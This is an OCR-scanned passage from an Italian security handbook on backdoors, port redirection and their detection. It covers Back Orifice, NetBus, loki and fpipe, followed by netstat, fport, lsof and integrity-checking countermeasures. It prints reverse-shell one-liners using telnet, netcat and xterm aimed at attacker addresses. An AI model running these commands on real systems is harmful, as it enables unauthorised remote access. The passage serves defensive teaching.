nosi, come utility grafiche per il controllo remoto o registratori dell'attività della ta- 
stiera. L'applicazione remote. exe è presentata in maggior dettaglio nel Capitolo 5. 


loki 


loki e lokid, cui abbiamo accennato brevemente nel Capitolo 11, rappresentano 
un meccanismo semplice per permettere a un intruso di ottenere nuovamente l’ac- 
cesso a sistemi manomessi, anche se protetti da firewall. 

L’ingegnosità di questo prodotto risiede nel fatto che il client (Loki) “racchiude” i 
comandi dell’hacker (fondamentalmente pacchetti IP) tra normali intestazioni ICMP 
o UDP e li invia al server (l1okid), che li esegue e restituisce il risultato. Dato che 
molti firewall consentono il passaggio di pacchetti ICMP e UDP diretti a un server, il 
traffico non regolare riesce abbastanza spesso ad attraversare il firewall senza pro- 
blemi. Il seguente comando avvia il server lokid: 


lokid -p-i -v1 
A questo punto, dal client: 
loki -d 172.29.11.191 -p-i -v1 -t 3 


Insieme, loki e lokid realizzano una backdoor permanente all’interno dei sistemi, 
a volte persino attraverso un firewall. 


Back Orifice e NetBus 


Nonostante la loro natura grafica, questi due tool si limitano fondamentalmente a 
chiamare le API di Windows da remoto e rientrano quindi nella categoria delle 
backdoor per l'esecuzione di comandi da remoto più che in quella dei sistemi grafi- 
ci di controllo remoto. Abbiamo già illustrato le funzionalità dei due tool nei Capito- 
li 4 e 5, ma ci sembra utile riportare in questo paragrafo le principali posizioni utiliz- 
zate dagli intrusi per l’installazione, in modo che gli amministratori possano identifi- 
carle meglio e prima. 

Il server di Back Orifice (BO) può essere configurato per l'installazione e l'esecuzio- 
ne con qualsiasi nome file (se non vengono specificate altre opzioni, [spazio].exe è 
l'impostazione predefinita). Durante l'installazione viene aggiunta nel Registro di si- 
stema una voce sotto HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur- 
rentVersion\RunServices, per lanciare il server a ogni avvio del sistema. Il server 
ascolta sulla porta UDP 31337, a meno che non venga configurato diversamente 
(ovviamente immaginate quale sia la regola). 

Back Orifice 2000 (BO2K) include tutte le funzionalità del suo predecessore, con 
due importanti eccezioni: gira sotto Windows NT/2000 (e non solo Win 9x) e mette 
a disposizione un kit per gli sviluppatori del codice sorgente, rendendo quindi 
estremamente difficile il riconoscimento di versioni personalizzate. Come imposta- 
zione predefinita, BO2K ascolta sulla porta TCP 54320 o UDP 54321 e crea una sua 
copia in un file di nome UMGR32.EXE in %systemroot%. 

Nell'elenco delle applicazioni assume le sembianze di EXPLORER per dissuadere 
tentativi di chiusura forzata. Se viene introdotto senza farsi notare, si installa nel Re- 
gistro di sistema nella posizione HKLM\SOFTWARE\Microsoft\Windows\ Curren- 
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tVersion\RunServices sotto forma di servizio chiamato “Remote Administration Ser- 
vice” e all'avvio del sistema cancella il file originale con il quale era riuscito a entra- 
re. Tutti questi valori possono essere modificati in modo estremamente semplice 
utilizzando l’utility bo2kcfg.exe compresa nel pacchetto. 

Anche NetBus è configurabile in vari modi ed esistono alcune varianti delle ver- 
sioni in circolazione su Internet. L’eseguibile di default del server si chiama pa- 
tch.exe (ma può essere rinominato in qualsiasi modo) e viene inserito nel Registro 
di sistema sotto HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current- 
Version\Run, in modo che il server venga lanciato a ogni avvio del sistema. Net- 
Bus ascolta per default sulla porta TCP 12345 o 20034 (ma anche questa imposta- 
zione è modificabile). 


© Contromisure a Back Orifice 2000 (e ad altri tool) 


L'utility BackOfficer Friendly, disponibile gratuitamente da Network Flight Recorder 
(http://ww.nfr.net/products/bof/), permette di intercettare semplicemente i 
tentativi di connessione a Back Orifice, ma anche a FTP, telnet, SMTP, HTTP e altro. 
Questo prodotto utilizza un'interfaccia grafica per Win32 e ascolta le porte, segna- 
lando qualsiasi tentativo di connessione al sistema. 

Una funzionalità molto interessante è rappresentata da Fake Replies, che risponde 
alle richieste telnet, registrando il nome utente e la password con cui l'aggressore 
cerca di ottenere l’accesso. 

Si tratta di un eccellente prodotto per riconoscere i tentativi di intrusione in un siste- 
ma, come dimostra la figura seguente. 


NFR BackOfficer Friendly - Warnings 


ThuJun 24 11:54:46. Telnet connection from 172.29.11.207 
ThuJun 24 11:54:57  Telnetlogin attempted from 172.29.11.207: user: root, password: passw 


Thu Jun 24 11:55:06 Telnet login attempted from 172.29.11.207: user: administrator, passwo 


Thudun 24 11:55:13 FTP connection from 172.29.11,207 
4 NFR 


ThudJun 24 11:55:41 Back Orifice saw 5 bytes of garbage from 172.29.11.207 
ThuJun 24 11:55:46 Back Orifice saw 6 bytes of garbage from 172.29.11.207 


Eliminare BO2K da una postazione remota è un'operazione semplice se è nota 
la password. Collegatevi al server dall'interfaccia grafica del client, selezionate 
Server Control ed eseguite il comando Sputdown Server specificando l'opzione 
DELETE. 

Il principio su cui trojan e backdoor si basano è l'incapacità, da parte dell'utente, di 
sapere con esattezza quali programmi sono attivi sul proprio sistema. Per contrasta- 
re questo tipo di attacchi può essere utile il programma Vision di Foundstone, scari- 
cabile gratuitamente, che permette di rilevare tutti i programmi attivi su un sistema 
Windows NT/2000. 

Come mostrato nella figura a pagina seguente, Vision visualizza l’elenco di tutte 
le porte e dei programmi associati a ciascuna di esse, in modo da mettere in 
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condizione l'utente di verificare se nel suo sistema arrivano pacchetti prove- 
nienti da qualche hacker. 


Vision 


C\Progiam Files\Intemet Explorer EXPLORE. EXE 

CAnthdil92 exe 

CWINNTXSystem324inatsrAnetinfo. exe 

C:\Program Files\Microsoft SQL Server\MSSQL\Binn\salservi.ewe 
sqlrervi C Program Files\Microsoft SQL Server\MSSQL\Binn\egkservi. ene 
sqlservi CAProgiam Files\Micrasoft SQL Server\MSSQL\Binn\sakervi.ewe 

CNWINNTAspatem32\svchost.ese 

CNWINNTspatam22\svchost exe 

CAWINNT\spstem324sass exe 

CMWINNT\spstem3Z\sarnces.exe 


Come si può vedere, sulle varie porte sono in ascolto diversi programmi, tra cui 
Explorer (IEXPLORE sulla porta UDP 5968), SQL Server (sqlservr.exe sulle porte 
UDP 1434, TCP 1433 e 16389), e qualcosa chiamato dll32 (c:\nt\dll32.exe sulla por- 
ta TCP 65535). Proprio quest’ultimo programma merita di essere analizzato con at- 
tenzione: Explorer può ragionevolmente essere in ascolto sulla porta UDP 5968, 
come pure SQL Server sulle sue porte, ma che dire di dll32.exe? Puzza di pesce mar- 
cio. Con le informazioni fornite da Vision possiamo ricercare dll32.exe nella cartella 
c:\nt e nel Registro di sistema, per verificare se è un'applicazione di sistema, oppu- 
re possiamo connetterci con netcat alla porta TCP 65535, per vedere se da essa en- 
tra qualcosa: nel nostro caso c'è un prompt dei comandi! 

G:\>nc -nvv 127.0.0.1 65535 

(UNKNOWN) [127.0.0.1] 65535 (?) open 


Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-2000 Microsoft Corp. 


Ci\nt> 


Connettendoci alla porta TCP 65535 abbiamo dunque individuato immediatamente 
l'attacco: ora non rimane che il problema di cancellare il programma dll32.exe dal 
sistema, cercando nel contempo di capire come sia stato possibile per qualcuno av- 
viare una sessione DOS sulla nostra macchina. 


Reindirizzamento delle porte: 


telnet inverso, netcat, datapipe, rinetd e fpipe 


] programmi di controllo remoto basati su shell che abbiamo visto sono stati trattati 
nel contesto di connessioni di controllo remoto dirette. Tuttavia, considerate la si- 
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tuazione in cui un firewall intermedio blocchi l'accesso diretto al sistema target: gli 
aggressori più ingegnosi sono in grado di aggirare l'ostacolo utilizzando il metodo 
del reindirizzamento delle porte. 

Una volta forzato un sistema di controllo dell'accesso, per esempio un firewall, l'aggres- 
sore può utilizzare il reindirizzamento delle porte per inoltrare tutti i pacchetti verso una 
specifica destinazione. Lo scopo di questa operazione è ottenere l’accesso a qualsiasi si- 
stema prima protetto dal firewall (o simile). Il reindirizzamento si basa sull’ascolto di 
certe porte e sull’inoltro di pacchetti “di base” a una destinazione secondaria prestabili- 
ta. In seguito presenteremo alcuni metodi per configurare manualmente il reindirizza- 
mento delle porte, utilizzando strumenti come telnet e netcat, o anche le utility spe- 
cializzate per il reindirizzamento delle porte, come datapipe, rinetd e fpipe. 


Telnet inverso 


Una delle nostre backdoor preferite all’interno dei sistemi manomessi può essere 
eseguita utilizzando il daemon telnet, fornito con la maggior parte delle distribu- 
zioni UNIX: non è quindi necessario scaricare alcun file. Ci riferiamo a questa tecni- 
ca come “telnet inverso”, perché utilizza telnet per collegarsi a finestre netcat in 
ascolto, quindi passa i comandi da una finestra al flusso telnet invertito, inviando 
l'output su una finestra diversa. 

Un telnet inverso si realizza a partire da due listener netcat sulla propria macchi- 
na, in questo modo: 


Ci\> nc -vv -1 -p 80 
D:\> nc -vv -1 -p 25 


Quindi si lancia il seguente comando UNIX sul sistema target, per leggere dalla por- 
ta 25, passare i dati alla shell locale (che esegue il comando) e inviare nuovamente 
l'output alla macchina di partenza, sulla porta 80. 


sleep 10000 | telnet 172.29.11.191 80 | /bin/sh | telnet 172.29.11.191 25 


1 Le porte utilizzate in questo esempio, 80 e 25, corrispondono a servizi co- 
| muni (HTTP e SMTP, rispettivamente) che vengono normalmente lasciati 
transitare sui firewall'in direzione di sistemi back-end. 


Inversione di shell mediante netcat 


Se netcat è disponibile, o può essere caricato sul sistema target, è possibile adotta- 
re una tecnica simile, denominata “inversione di shell” (in inglese shell sboveling) 
perché rinvia sostanzialmente una sessione di comando sulla macchina dell’intruso, 
Ipotizzate che l'esempio successivo venga eseguito dal prompt dei comandi remoti 
della macchina target: 


nc <attacker_IP> 80 | cmd.exe ! nc <attacker_IP> 25 


Se la macchina attacker.com è in ascolto con netcat sulle porte TCP 80 e 25, abili- 
tate rispettivamente per il traffico da e verso la macchina della vittima attraverso il 
firewall, questo comando attiva una nuova shell di comando remota dal sistema 
della vittima. La Figura 14.3 mostra il sistema dell’hacker relativo a questo esempio: 
nella parte superiore viene mostrata la finestra di input in ascolto sulla porta 80 che 
invia il comando ipconfig, mentre nella parte inferiore viene mostrato l'output ri- 
cevuto dalla macchina della vittima sulla porta 25. 
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s Toolbox Command Prompt - nc -nvy -1-p 80 


D:\Toolbox>nc -nuv -1 -p 80 
listening on [any] 80 . 


onnect to [192.168. 234.361 from (UNKNOWN) [192.168.294 .110 


sent 13, rcvd @ 


D:\Toolbox>nc -nuv -1 -p 80 


listening on [any] 80 
connect to [192. 168. 234.36] from (UNKNOWN) [192.168.294 .110 


D:\Toolbox>nc -vv -1 -p 25 
listening on [any] 25 .. 
iconnect to [192. 168. 234.36] from CORP-DC [192.168.294 110] 
icrosoft Windows 2000 [Version 5.00.2195] 

{C) Copyright 1985-1999 Microsoft Corp. 


:\Documents and Settings\Administrator>ipconfig 


indows 2009 IP Configuration 


thernet adapter Local Area Connection 3: 


Hedia' State 1... bada Disconnec j 


Ethernet adapter Local Area Connection: 


Connection-specific DNS Suffix 


IP MOORRE: : 192.168.234 .110 
. î si 


Figura 14.3 


Utilizzando netcat sia sul sistema dell'hacker sia su quello della vittima, una shell può venire inviata 
nuovamente sul sistema dell'hacker, In questo esempio i comandi inseriti nella finestra in alto 
sono eseguiti dal sistema remoto e i risultati sono riportati nella finestra più in basso. 


datapipe 


Realizzare il reindirizzamento delle porte utilizzando tre sessioni netcat configurate ma- 
nualmente, come mostrato nell'esempio precedente, potrebbe destare un po’ di scon- 
certo, per questo sono disponibili su Internet diverse utility progettate specificatamente 
per eseguire il reindirizzamento delle porte. Per i sistemi UNIX segnaliamo un program- 
ma denominato datapipe (http://packetstormsecurity.org/unix-exploits/tcp- 
exploits/datapipe.c). L'hacker può configurare il reindirizzamento delle porte in 
modo da inviare su un sistema NT retrostante (porta 139), o su se stesso, i pacchetti rice- 
vuti sulla porta 65000. È anche possibile realizzare l'operazione opposta: eseguire data - 
pipe in modo che ascolti sulla porta 139 di un sistema e reindirizzi il traffico sulla porta 
65000 del target. Per esempio, per attaccare una macchina NT (172.29.11.100) protetta 
da un firewall, si lancia il seguente comando sull’host forzato (172.29.11.2): 


datapipe 65000 139 172.29.11.100 
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Al proprio terminale si esegue datapipe in modo che ascolti sulla porta 139 e inoltri 
i pacchetti sulla porta 65000 dell’host manomesso: 


datapipe 139 65000 172.29.11.2 


A questo punto è possibile accedere alla macchina NT target (172.29.11.100) attra- 
verso il firewall. La Figura 14.4 mostra lo schema di funzionamento del reindirizza- 
mento delle porte, evidenziandone l'efficacia nel caso di firewall a filtraggio dei 
pacchetti, configurati per consentire il traffico destinato a porte con numero identi- 
ficativo elevato. 


In ascolto 
sulla porta 
65000 


Sistema NT target 
172.29.11.100 


Host compromesso 
172.29.11.2 


La redirezione 
delle porte 
riesce a superare 
indenne i filtri 
sui pacchetti 
applicati 
dai firewall, poiché 
spesso le porte , 
più alte verso Firewall 


172.29.11.1 
(interno) 


i sistemi interni 192.168.100.1 (esterno) 
sono lasciate 
libere. 
Redirezione In ascolto 
sulla porta sulla porta 


Sistema di redirezione Portatile NT 
dell'aggressore dell’aggressore 


Figura 14.4 
Reindirizzamento delle porte. 
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fpipe 


fpipe è uno strumento per l’inoltro e il reindirizzamento delle porte TCP di origine 
realizzato da Foundstone, ed è realizzato dai proprietari di Foundstone Inc. Il pac- 
chetto crea un flusso TCP con una porta di origine selezionabile dall'utente. Può an- 
che essere utilizzato per eseguire il reindirizzamento delle porte come mostrato nel- 
la Figura 14.4, e questo ne fa un valido sostituto di datapipe, notoriamente utilizza- 
bile solo sui sistemi UNIX, sulle piattaforme Windows. 

fpipe si differenzia da altri pacchetti per il reindirizzamento delle porte, come per 
esempio rinetd, perché consente di specificare una porta di origine per il traffico 
inoltrato. Durante i tentativi di intrusione la possibilità di cambiare porta è fonda- 
mentale per aggirare un firewall, o un router che permette il passaggio di traffico 
originato solo su certe porte (per esempio, il traffico originato sulla porta TCP 25 
può comunicare solo con il server di posta). Normalmente le porte di origine con 
identificativo numerico elevato, che in genere vengono pesantemente filtrate dal 
firewall, sono assegnate dal protocollo TCP/IP alle connessioni client: il firewall, 
tuttavia, potrebbe consentire il passaggio del traffico DNS (è quello che infatti suc- 
cede). fpipe può essere configurato per forzare l’utilizzo di una porta di origine 
specifica, affinché il firewall “veda” il flusso di dati come un servizio autorizzato e lo 
lasci passare. 


di origine per una connessione in uscita che viene poi chiusa, potreste non 
essere in grado di ricollegarvi alla macchina remota (fpipe dichiarerà che 
l'indirizzo è già utilizzato) fino alla scadenza dei timer TCP TIME_WAIT e 
CLOSE_WAIT: questi ultimi possono avere un valore compreso tra 30 secon- 
di e 4 minuti, a seconda del tipo e della versione del sistema operativo uti- 
lizzato. Il valore dei timer è una caratteristica del protocollo TCP e non è 
una limitazione di fpipe. Questo accade perché fpipe cerca di stabilire 
una nuova connessione alla macchina remota utilizzando la stessa combi- 
nazione indirizzo IP/numero porta locale e indirizzo IP/numero porta re- 
mota della sessione precedente, e non se ne può stabilire una finché lo stack 
TCP non ba dichiarato terminata quella precedente. 


ù Ricordate che se utilizzate l'opzione -s per specificare il numero della porta 


Manomissione dei terminali X Windows 
e di altri terminali grafici 


Sugli host UNIX, se il client Xterm (TCP 6000) consente il traffico in uscita senza 
limitazioni, è possibile perfezionare alcune delle tecniche di reindirizzamento 
delle porte viste in precedenza con lo scopo di aprire un terminale grafico sul 
sistema dell’hacker, al quale si accederà avviando un server X ed eseguendo il 
comando seguente: 


xterm -display <attacker_ip>:0.0 & 


Sui sistemi Windows le cose sono un po’ più complesse, perché sono di gran lunga 
meno soggetti all’installazione immediata di backdoor “presto e bene”; inoltre, non 
c'è niente di peggio che utilizzare funzionalità esistenti, come Terminal Server per 
Windows, o prodotti basati sull’architettura ICA (/ndependent Computing Architec- 
ture) di Citrix (http://www.citrix.com), per creare sessioni remote sul computer 
dell'hacker. In Windows 2000, Terminal Server, proposto come un componente in- 
tegrato opzionale, risulta essere maggiormente accessibile, rispetto a quanto poteva 
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accadere utilizzando una edizione completamente diversa, come NT4. Potete utiliz- 
zare uno strumento come sclist, distribuito insieme al Resource Kit, per verificare 
se su un sistema remoto compromesso si trovino abilitati i Terminal Service, quindi 
utilizzare un account privilegiato esistente per eseguire la connessione. L'esempio 
seguente mostra l'utilizzo di sclist su un sistema Windows 2000 Advanced Server 
(modificato per motivi di impaginazione): 


D:\Toolbox> sclist athena 


- Service list for athena 


running Alerter Alerter 

running © TermService Terminal Services 
running TermServLicensing Terminal Services 
Licensing 

stopped TFTPD Trivial FTP Daemon 


stopped TIlntSvr Telnet 


Se è installato anche Terminal Services Licensing è possibile che il server sia confi- 
gurato in modalità application, anziché in modalità administration, e quindi sclist 
può essere di poca utilità per l'hacker (Microsoft suggerisce di installare i server Li- 
censing e Terminal su macchine distinte). 


© Contromisure generali 
all'esecuzione di applicazioni backdoor 


Abbiamo presentato numerosi strumenti e tecniche utilizzabili da un intruso per rea- 
lizzare una backdoor in un sistema: ma come può un amministratore eliminare que- 
sti antipatici strumenti? 


Strumenti automatici 


Come si suol dire, prevenire è meglio che curare. La maggior parte dei prodotti an- 
tivirus di buona qualità attualmente in commercio eseguono la ricerca e rilevano 
automaticamente i tentativi di backdoor prima che questi possano provocare danni 
(per esempio, prima di accedere all'unità floppy o di scaricare gli allegati di posta 
elettronica). I principali produttori di antivirus sono elencati nell'articolo Q49500 di 
Microsoft Knowledge Base all'indirizzo http://support.microsoft.com/sup- 
port/kb/articles/Q049/5/00.ASP. 

Segnaliamo tra gli altri uno strumento poco costoso denominato The Cleaner, distri- 
buito da MooSoft Development, che è in grado di identificare e rimuovere oltre 
1000 tipi diversi di backdoor e trojan (o almeno questo è quanto sostenuto nei de- 
pliant pubblicitari). Per maggiori informazioni vi rimandiamo all'indirizzo http:// 
www.moosoft.com. 

Quando scegliete un prodotto, assicuratevi che effettui la ricerca su dati significativi, 
come le impronte binarie o le voci del Registro del sistema, che non sono facilmen- 
te modificabili dagli aggressori meno esperti, e ricordate che questi strumenti sono 
efficaci solo se vengono mantenuti aggiornati i loro database. 
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Realizzare l’inventario 


Supponendo che il sistema sia già stato manomesso, la sorveglianza è l’unico rime- 
dio contro quasi tutte le backdoor esaminate in precedenza. Gli amministratori più 
attenti dovrebbero essere in grado di rendere conto di qualsiasi aspetto dello stato 
del sistema, e sapere dove individuare velocemente un supporto di ripristino affida- 
bile. Vi consigliamo vivamente di effettuare un inventario di tutti i sistemi critici su- 
bito dopo l'installazione iniziale e dopo ogni aggiornamento o installazione succes- 
siva. Per ulteriore sicurezza da eventuali attacchi, inoltre, potete utilizzare program- 
mi di controllo delle porte TCP e UDP, come Vision di Foundstone. 

Tenere traccia dello stato dei sistemi può essere estremamente oneroso in un ambien- 
te dinamico, in particolare sulle stazioni di lavoro personali, ma nel caso di server di 
produzione relativamente statici può rivelarsi uno strumento molto utile per verificare 
l'integrità di un host potenzialmente compromesso. Un metodo semplice per svolgere 
questa operazione è ricorrere a strumenti di system-imaging che verranno descritti nei 
paragrafi successivi. Nella parte restante di questo paragrafo vedremo alcuni metodi 
manuali gratuiti (molti sono integrati nei sistemi) che possono essere utilizzati per te- 
nere traccia delle attività eseguite in un sistema. Seguendo i suggerimenti forniti di se- 
guito, prima che l'attacco abbia luogo, avrete un vantaggio iniziale quando si tratterà 
di capire cosa è successo. Per pura coincidenza, molte di queste tecniche possono es- 
sere utilizzate anche come esercizio di indagine dopo un’intrusione. 


Chi c’è in ascolto su quelle porte? 


Potrebbe sembrare ovvio, ma non sottostimate mai la potenza di netstat per iden- 
tificare connessioni in ascolto come quelle descritte in questo capitolo. Il seguente 
esempio mostra l'utilità di questo strumento (modificato per brevità): 


D:\Toolbox> netstat -an 


Active Connections 


Proto Local Address Foreign Address State 

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:54320 0.0.0.0:0 LISTENING 
TCP 192.168.234.36:139 0.0.0.0:0 LISTENING 
UDP 0.0.0.0:31337 Lal al 


Siete in grado di dire cosa c'è di sbagliato in questa schermata, basandovi sulle in- 
formazioni fornite in questo capitolo? 

Come noterete, il solo punto debole di netstat è che non è in grado di specificare 
chi c'è effettivamente in ascolto sulle porte. Nei sistemi Windows NT e 2000, è pos- 
sibile visualizzare questa informazione utilizzando fPort di Foundstone Inc., che è 
la versione a riga di comando di Vision: 


D:\Toolbox> fport 


fPort - Process port mapper 
Copyright(c) 2000, Foundstone, Inc. 
http://ww.foundstone.com 


PID NAME TYPE PORT 


222 IEXPLORE UDP 1033 
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224 OUTLOOK UDP 1107 
224 OUTLOOK UDP 1108 
224 OUTLOOK TCP 1105 
224 OUTLOOK UDP 1106 
224 OUTLOOK UDP 0) 
245 MAPISP32 UDP 0) 
266 ne TCP 2222 


Questo comando consente di rilevare la presenza di un listener di netcat sulla por- 
ta 2222, mentre utilizzando netstat l’unica informazione fornita sarebbe stata il nu- 
mero della porta. Il tool Vision di Foundstone costituisce un'interfaccia grafica per 
l'output del comando fport. 

Per effettuare la scansione di una rete di grandi dimensioni alla ricerca di porte so- 
spette in ascolto, la scelta migliore è utilizzare un port scanner o uno strumento di 
scansione come quelli presentati nel Capitolo 2. 

In ogni caso, il risultato non dice granché, se non si sa cosa cercare. La Tabella 14.1 
riporta alcune impronte distintive dei sistemi di controllo remoto. 


Tabella 14.1 |numeridelle porte utilizzate dalle backdoor per controllo remoto 


Backdoor TCP predefinito UDP Consente 

predefinito porte 
alternative 

Remote.exe 135-139 135-139 No 

Netcat Qualsiasi Qualsiasi Sì 

Loki Non disponibile Non Non disponibile 
disponibile 

Telnet inverso Qualsiasi Non Sì 


Back Orifice 


Non disponibile 


disponibile 
31337 


Back Orifice 2000 54320 54321 Sì 
NetBus 12345 Non disponi- Sì 
bile 
Masters Paradise 40421, 40422, 40426 NA Sì 
pcAnywhere 22, 5631, 5632, 65301 22, 5632 No 
ReachOut 43188 Nessuna No 
Remotely Anywhere 2000, 2001 Nessuna Sì 
Remotely Possible/ ControlIlT — 799, 800 800 Sì 
Timbuktu 407 407 No 
VNC 5800, 5801.. Nessuna Sì 
Terminal Server per Win- 3389 3389 No 
dows 
NetMeeting Remote Desktop 49608, 49609 49608, 49609 No 
Control 
Citrix ICA 1494 1494 No 


Se sui sistemi che gestite trovate una di queste porte in ascolto (e non avete attivato 
voi stessi uno di questi programmi), con ogni probabilità significa che sono stati 
manomessi da un hacker malintenzionato o da un utente inconsapevole. Prestate 
anche attenzione a eventuali altre porte che si comportano in modo non usuale, 
poiché molti di questi tool possono essere configurati in modo da ascoltare su porte 
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alternative, come segnalato nella Tabella 14.1. Servitevi di dispositivi di sicurezza 
esterni per limitare l’accesso a queste porte via Internet. 

Per maggiori informazioni sui numeri di porta associati alle backdoor, potete con- 
sultare gli indirizzi seguenti: 

e http://wmw.tlsecurity.net/ 

e http://ww.commodon.com/threat/threat-ports.htm 


e http://ww.chebucto.ns.ca/-rakerman/port-table.html 


Eliminazione dei processi intrusi 


Un'altra possibilità per verificare la presenza di backdoor è esaminare l'elenco dei 
processi alla ricerca di eseguibili come nc, WINVNC.exe, e così via. In Windows è 
possibile utilizzare pulist (compreso nell’N'TRK) per elencare i processi in esecuzio- 
ne, o sclist per i servizi. I comandi pulist e sclist sono semplici da utilizzare, e 
possono essere facilmente sfruttati all’interno di script per automatizzare le ricerche 
sul sistema locale o sull’intera rete. Questo è un esempio dell'output di pulist: 


C:\nt\ew> pulist 


Process PID User 

Idle (o) 

System 2 

smss.exe 24 NT AUTHORITY\SYSTEM 
CSRSS.EXE 32 NT AUTHORITY\SYSTEM 
WINLOGON. EXE 38 NT AUTHORITY\SYSTEM 
SERVICES. EXE 46 NT AUTHORITY\SYSTEM 
LSASS. EXE 49 NT AUTHORITY\SYSTEM 
CMD.EXE 295 TOGA\administrator 
nfrbof.exe 265 TOGA\administrator 
UEDIT32. EXE 313 TOGA\administrator 
NTVDM. EXE 267 TOGA\administrator 
PULIST.EXE 309 TOGA\administrator 
Ci\nt\ew> 


sclist riporta l'elenco dei servizi attivi su una macchina remota, come si vede 
nell'esempio seguente: 

i 

C:\nt\ew> sclist \\172.29.11.191 


Alerter Alerter 

Browser Computer Browser 
Clipsrv ClipBook Server 
DHCP DHCP Client 
EventLog EventLog 
LanmanServer Server 
LanmanWorkstation Workstation 
LicenseService License Logging Service 
Schedule Schedule 

Spooler Spooler 

TapiSrv Telephony Service 
UPS UPS 
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In UNIX è possibile utilizzare il comando ps. Le opzioni disponibili per questo co- 
mando tendono a cambiare in relazione all’'implementazione di UNIX; per Linux in- 
vece si utilizza ps -aux, per Solaris ps -ef. È possibile (e vivamente consigliato) 
utilizzare questi comandi all’interno di script, per segnalare cambiamenti nei pro- 
cessi in esecuzione. Altri eccellenti strumenti UNIX che consentono di mappare i 
servizi in ascolto a processi in esecuzione sono lsof (ftp://vic.cc.purdue 
.edu/pub/tools/unix/lsof/NEW/), disponibile per la maggior parte delle imple- 
mentazioni UNIX, e sockstat per FreeBSD. Viene riportato di seguito uno stralcio 
dell'output di questi strumenti: 


[crush] 1lsof -i 


COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME 

syslogd 111 root 4u IPv4 0xc5818f00 Oto UDP *:syslog 

dhcepd 183 root 7u IPv4 0xc5818e40 Ot® UDP *:bootps 

dhcpd 183 root 10u IPv4 0xc5bc2f00 Oto ICMP *:* 

sshd 195 root 3u IPv4 0xc58d9d80 Oto TCP *:ssh (LISTEN) 

sshd 1062 root 4u IPv4 0xc58da500 oto TCP crush: 
ssh->192.168.1.101:2420 (ESTABLISHED) 

Xaccel 1165 root 3u IPv4 0xc58dad80 Ot® TCP *:6000 (LISTEN) 

gnome -ses 1166 root 3u IPv4 @xc58dab60 OtO TCP *:1043 (LISTEN) 

panel 1201 root 5u IPv4 0xc58da940 Ot0 TCP *:1046 (LISTEN) 

gnome-nam 1213 root 4u IPv4 0xc58da2e0 Oto TCP *:1048 (LISTEN) 

gen_util_ 1220 root 4u IPv4 0xc58dbd80 Oto TCP *:1051 (LISTEN) 

sshd 1245 root 4u IPv4 @0xc58da720 Oto TCP crush: 


ssh->192.168.1.101:2642 (ESTABLISHED) 


[crush] sockstat 


USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS 
root sshd 1245 4 tcep4 10.1.1,1.22 192.168.1.101.2642 
root gen util 1220 4 tcp4 *.1051 ic 

root gnome-na 1213 4 tcp4 *,1048 ala 

root panel 1201 5 tcep4 *.1046 *,% 

root gnome-se 1166 3 tcp4 *.1043 ai 

root Xaccel 1165 3 tcp4 *.6000 Leil'Ti 

root sshd 1062 4 tcp4 10.1.1.1.22 192.168.1.101.2420 
root sshd 195 3 tcp4 #22 lla 

root dhcpd 183 7 udp4 *.67 #1 

root syslogd 111 4 udp4 *,514 ®, 


Ovviamente, essendo possibile rinominare la maggior parte degli eseguibili consi- 
derati, è difficile distinguere una backdoor da un servizio o processo legittimo, a 
meno che non abbiate realizzato un inventario del vostro sistema subito dopo l’in- 
stallazione iniziale e dopo ogni aggiornamento o installazione successiva (altro pre- 
zioso consiglio). 


Schedare il file system 


Creare periodicamente elenchi completi di file e directory da confrontare con quelli 
precedenti potrebbe sembrare una follia per gli amministratori sovraccarichi di la- 
voro, ma è il metodo più sicuro per mettere in evidenza profili sospetti, se lo stato 
del sistema non è eccessivamente dinamico. 

Nel caso di Novell, il comando ndir permette di monitorare la dimensione del fi- 
le, la data di ultimo accesso e così via. In UNIX è possibile realizzare uno seript 
che registri ogni nome file con la corrispondente lunghezza utilizzando il coman- 
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do ls -la. In Windows si può utilizzare il comando dir per registrare l’ultima 
data di modifica e di accesso, oltre alle dimensioni del file. Vi consigliamo anche 
gli strumenti afind, hfind e sfind prodotti da NTObjectives, che consentono di 
catalogare i file senza modificare la data di accesso offrendo anche la possibilità 
di identificare i file nascosti e i flussi di dati alternativi all’interno dei file. In Win- 
dows NT/2000 è possibile abilitare l’auditing delle attività a livello dei file e utiliz- 
zare le funzionalità integrate del file system NT (NTFS): è sufficiente fare clic con 
il tasto destro del mouse sul file o sulla directory desiderata, selezionare la scheda 
Security, fare clic sul pulsante Auditing e assegnare fe impostazioni appropriate 
per ciascun utente 0 gruppo. 

Windows 2000 introduce il servizio WFP (Windows File Protection), che consente di 
proteggere da sovrascrittura i file di sistema installati mediante il programma di in- 
stallazione di Windows 2000 (che comprende circa 640 file sotto la directory %sy- 
stemroot%). Un effetto collaterale interessante di questa funzionalità è che gli hash 
SHA-1 dei file critici vengono mantenuti in un file memorizzato in %systemro- 
ot%\system32\dllcache\nt5.cat, per poterli confrontare con gli hash SHA-1 del file 
System corrente al fine di verificare la loro integrità. La verifica può essere eseguita 
dal programma File Signature Verification (sigverif.exe): fate clic sul pulsante 
Advanced, selezionate la scheda Logging, quindi selezionate l'opzione Append To 
Existing Log File per confrontare i risultati con quelli ottenuti da esecuzioni prece- 
denti. Notate, tuttavia, che WFP non associa a ogni file la sua impronta univoca. 
Tra gli strumenti forniti da terze parti segnaliamo MDSsum, un programma per la 
verifica dell'integrità dei file disponibile come parte del pacchetto Textutils, rilascia- 
to sotto la General Public License GNU (ftp://ftp.gnu.org/pub/gnu/textuti- 
1s/). Una versione compilata per Windows è fornita con la distribuzione Cygwin, 
disponibile all’indirizzo http://sources.redhat.com/cygwin/. MDSsum è in gra- 
do di calcolare o verificare il message digest a 128 bit di un file utilizzando il popo- 
lare algoritmo di cifratura MDS, scritto da Ron Rivest del laboratorio del MIT (Mas- 
sachusetts Institute of Technology) per Computer Science and RSA Security, e dispo- 
nibile nella RFC 1321. Di seguito viene riportato un esempio che mostra la creazio- 
ne e la modifica del checksum di un file da parte del programma MDSsum: 


D:\Toolbox> md5sum d:\test.txt > d:\test.md5 


D:\Toolbox> cat d:\test.md5 
efd3907b04b037774d831596f2c1b14a d:\\test.txt 


D:\Toolbox> md5sum --check d:\test.md5 
d:\\test.txt: 0K 


Sfortunatamente, MDSsum può essere utilizzato su un solo file alla volta, Ovvia- 
